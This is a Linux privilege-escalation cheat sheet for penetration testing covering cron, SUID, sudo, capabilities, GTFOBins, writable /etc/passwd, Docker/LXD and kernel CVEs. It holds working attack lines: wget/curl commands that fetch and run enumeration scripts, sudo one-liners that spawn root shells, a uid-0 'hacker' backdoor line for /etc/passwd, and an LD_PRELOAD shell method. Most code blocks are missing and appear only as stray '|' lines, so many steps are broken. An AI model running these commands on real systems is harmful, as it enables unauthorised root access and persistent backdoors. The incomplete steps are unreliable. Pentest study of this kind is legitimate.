Linux Privilege Escalation
Tools
There are many scripts that you can execute on a linux machine which automatically enumerate sytem information, processes, and files to locate privilege escelation vectors. Here are a few:
-
LinPEAS - Linux Privilege Escalation Awesome Script
wget "https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh" -O linpeas.sh curl "https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh" -o linpeas.sh ./linpeas.sh -a #all checks - deeper system enumeration, but it takes longer to complete. ./linpeas.sh -s #superfast & stealth - This will bypass some time consuming checks. In stealth mode Nothing will be written to the disk. ./linpeas.sh -P #Password - Pass a password that will be used with sudo -l and bruteforcing other users
-
LinuxSmartEnumeration - Linux enumeration tools for pentesting and CTFs
wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -O lse.sh curl "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -o lse.sh ./lse.sh -l1 # shows interesting information that should help you to privesc ./lse.sh -l2 # dump all the information it gathers about the system
-
LinEnum - Scripted Local Linux Enumeration & Privilege Escalation Checks
./LinEnum.sh -s -k keyword -r report -e /tmp/ -t
-
BeRoot - Privilege Escalation Project - Windows / Linux / Mac
-
linuxprivchecker.py - a Linux Privilege Escalation Check Script
-
unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check
Scheduled tasks
Cron jobs
Check if you have access with write permission on these files.
Check inside the file, to find other paths with write permissions.
|
|
You can use pspy to detect a CRON job.
|
####Cron job Bash exploit Overwrite the Bash script with the following if you have write permissions:
|
Setup a Netcat listener and wait for the cron job to execute the script.
####Cron job PATH environment variable exploit Run lse.sh and check for “Can we write to any paths present in cron jobs”. Create the following script matching the name of the cron job in /tmp:
|
Make sure the script is executable:
|
Wait for the cron job to run and then execute the newly created SUID script in /tmp:
|
You will now have a root shell.
Refer: linux-privilege-escalation-by-exploiting-cron-jobs https://materials.rangeforce.com/tutorial/2020/04/17/Cron-Privilege-Escalation/
Systemd timers
|
PATH Variables
First, search for the file having SUID or 4000 permission with help of Find command.
|
If executing ps
in the shell, Example:
|
Then:
Method 1:
|
Method 2:
|
If executing id
in the shell, Example:
|
Then:
|
If executing cat
in the shell, Example:
|
Then:
|
|
Refer: https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/
SUID
Find SUID binaries
|
Exploitation SUID
Cp
|
Nmap
|
|
Vi
|
Find
|
|
Python
|
Strace
|
Tcpdump
|
Create a SUID binary
|
Capabilities
List capabilities of binaries
|
|
Edit capabilities
|
Interesting capabilities
Having the capability =ep means the binary has all the capabilities.
|
Alternatively the following capabilities can be used in order to upgrade your current privileges.
|
Privilege escalation with cap_setuid+ep
and python
|
Privilege escalation with cap_setuid+ep
and Perl
|
Privilege escalation with cap_dac_read_search
and zip
|
Privilege escalation with tar = cap_dac_read_search+ep
|
Capabilities name | Description |
---|---|
CAP_AUDIT_CONTROL | Allow to enable/disable kernel auditing |
CAP_AUDIT_WRITE | Helps to write records to kernel auditing log |
CAP_BLOCK_SUSPEND | This feature can block system suspends |
CAP_CHOWN | Allow user to make arbitrary change to files UIDs and GIDs |
CAP_DAC_OVERRIDE | This helps to bypass file read, write and execute permission checks |
CAP_DAC_READ_SEARCH | This only bypass file and directory read/execute permission checks |
CAP_FOWNER | This enables to bypass permission checks on operations that normally require the filesystem UID of the process to match the UID of the file |
CAP_KILL | Allow the sending of signals to processes belonging to others |
CAP_SETGID | Allow changing of the GID |
CAP_SETUID | Allow changing of the UID |
CAP_SETPCAP | Helps to transferring and removal of current set to any PID |
CAP_IPC_LOCK | This helps to lock memory |
CAP_MAC_ADMIN | Allow MAC configuration or state changes |
CAP_NET_RAW | Use RAW and PACKET sockets |
CAP_NET_BIND_SERVICE | SERVICE Bind a socket to internet domain privileged ports |
Reference: Capabilities |
SUDO
Tool: Sudo Exploitation
Sudo configuration might allow a user to execute some command with another user privileges without knowing the password. View sudo rights:
|
Allow Root Privilege to Binary commands
(root) ALL: run all command as root user.
|
Find
|
Perl
|
Python
|
Less
|
Time
|
AWK
|
Man
|
Vi
|
|
Sed
|
Xxd
|
Cat:
|
Allow Root Privilege to Shell Script
ALL= (root) NOPASSWD: /bin/script/file.sh, /bin/script/file.py, shell
Python
|
C
|
|
Bash script
|
Allow Sudo Right to other Programs
ALL=(ALL) NOPASSWD: /usr/bin/env, /usr/bin/ftp, /usr/bin/scp, /usr/bin/socat
Env
|
FTP/GDB
|
Socat
|
SCP Syntax: scp SourceFile user@host:~/path of the directory
|
Zip
|
Tar
|
Strace
|
Tcpdump
|
Nmap
|
Git
|
LD_PRELOAD
If LD_PRELOAD
is explicitly defined in the sudoers file
|
Compile the following shared object using the C code below with gcc -fPIC -shared -o shell.so shell.c -nostartfiles
|
Execute any binary with the LD_PRELOAD to spawn a shell : sudo LD_PRELOAD=<full_path_to_so_file> <program>
, e.g: sudo LD_PRELOAD=/tmp/shell.so find
Doas
There are some alternatives to the sudo
binary such as doas
for OpenBSD, remember to check its configuration at /etc/doas.conf
|
sudo_inject
Using https://github.com/nongiach/sudo_inject
|
Slides of the presentation : https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf
CVE-2019-14287
|
GTFOBins
GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks.
gdb -nx -ex ‘!sh’ -ex quit
sudo mysql -e ‘! /bin/sh’
strace -o /dev/null /bin/sh
sudo awk ‘BEGIN {system("/bin/sh")}’
Wildcard
By using tar with –checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and that’s where the wildcard comes in handy.
|
Tool: wildpwn
Writable files
List world writable files on the system.
|
Writable /etc/sysconfig/network-scripts/ (Centos/Redhat)
/etc/sysconfig/network-scripts/ifcfg-1337 for example
|
src : [https://vulmon.com/exploitdetailsqidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f] (https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f)
Writable /etc/passwd
First generate a password with one of the following commands.
|
Then add the user hacker
and add the generated password.
|
E.g: hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash
You can now use the su
command with hacker:hacker
Alternatively you can use the following lines to add a dummy user without a password.
WARNING: you might degrade the current security of the machine.
|
NOTE: In BSD platforms /etc/passwd
is located at /etc/pwd.db
and /etc/master.passwd
, also the /etc/shadow
is renamed to /etc/spwd.db
.
Writable /etc/sudoers
|
Exploiting Services
It’s always worth checking services because you might find a version that has a PoC exploit available.
You might also find internal services that can be accessed by port forwarding.
Services manual enumeration
Search for services running as root:
ps aux | grep "^root"
Enumerate version details:
<SERVICE> --version
or
dpkg -l | grep <SERVICE>
or
rpm -qa | grep <SERVICE>
Automatic enumeration
lse.sh:
./lse.sh -l 1 -i
Check for services like MySQL. Can you login as root wtihout password?
Run service versions through searchsploit to check for PoC exploits.
Port forwarding
Port forwarding is something you definitely need to be able to do for your exam. I found it a bit confusing at first but once you get the concept it’s quite straight forward. Run netstat to check for open internal ports:
netstat -nl
Port forward via SSH:
ssh -R <KALI-PORT>:127.0.0.1:<SERVICE-PORT> <KALI-USERNAME>@<KALI-IP>
Example: ssh -R 5555:127.0.0.1:3306 root@10.10.10.10
NFS Root Squashing
When no_root_squash appears in /etc/exports
, the folder is shareable and a remote user can mount it.
|
Shared Library
ldconfig
Identify shared libraries with ldd
|
Create a library in /tmp
and activate the path.
|
RPATH
|
By copying the lib into /var/tmp/flag15/
it will be used by the program in this place as specified in the RPATH
variable.
|
Then create an evil library in /var/tmp
with gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6
|
Groups
Docker
Mount the filesystem in a bash container, allowing you to edit the /etc/passwd
as root, then add a backdoor account toor:password
.
|
Almost similar but you will also see all processes running on the host and be connected to the same NICs.
|
Or use the following docker image from chrisfosterelli to spawn a root shell
|
More docker privilege escalation using the Docker Socket.
|
LXC/LXD
The privesc requires to run a container with elevated privileges and mount the host filesystem inside.
|
Build an Alpine image and start it using the flag security.privileged=true
, forcing the container to interact as root with the host filesystem.
|
Alternatively https://github.com/initstring/lxd_root
Kernel Exploits
Precompiled exploits can be found inside these repositories, run them at your own risk !
The following exploits are known to work well, search for more exploits with searchsploit -w linux kernel centos
.
Another way to find a kernel exploit is to get the specific kernel version and linux distro of the machine by doing uname -a
Copy the kernel version and distribution, and search for it in google or in https://www.exploit-db.com/.
CVE-2016-5195 (DirtyCow)
Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8
|
CVE-2010-3904 (RDS)
Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
|
CVE-2010-4258 (Full Nelson)
Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04)
|
CVE-2012-0056 (Mempodipper)
Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64)
|
LIST
|
References
-https://thecryptonian.co.uk/linux-privilege-escalation-cheat-sheet/ -https://github.com/Ignitetechnologies/Privilege-Escalation -https://www.hackingarticles.in/category/privilege-escalation/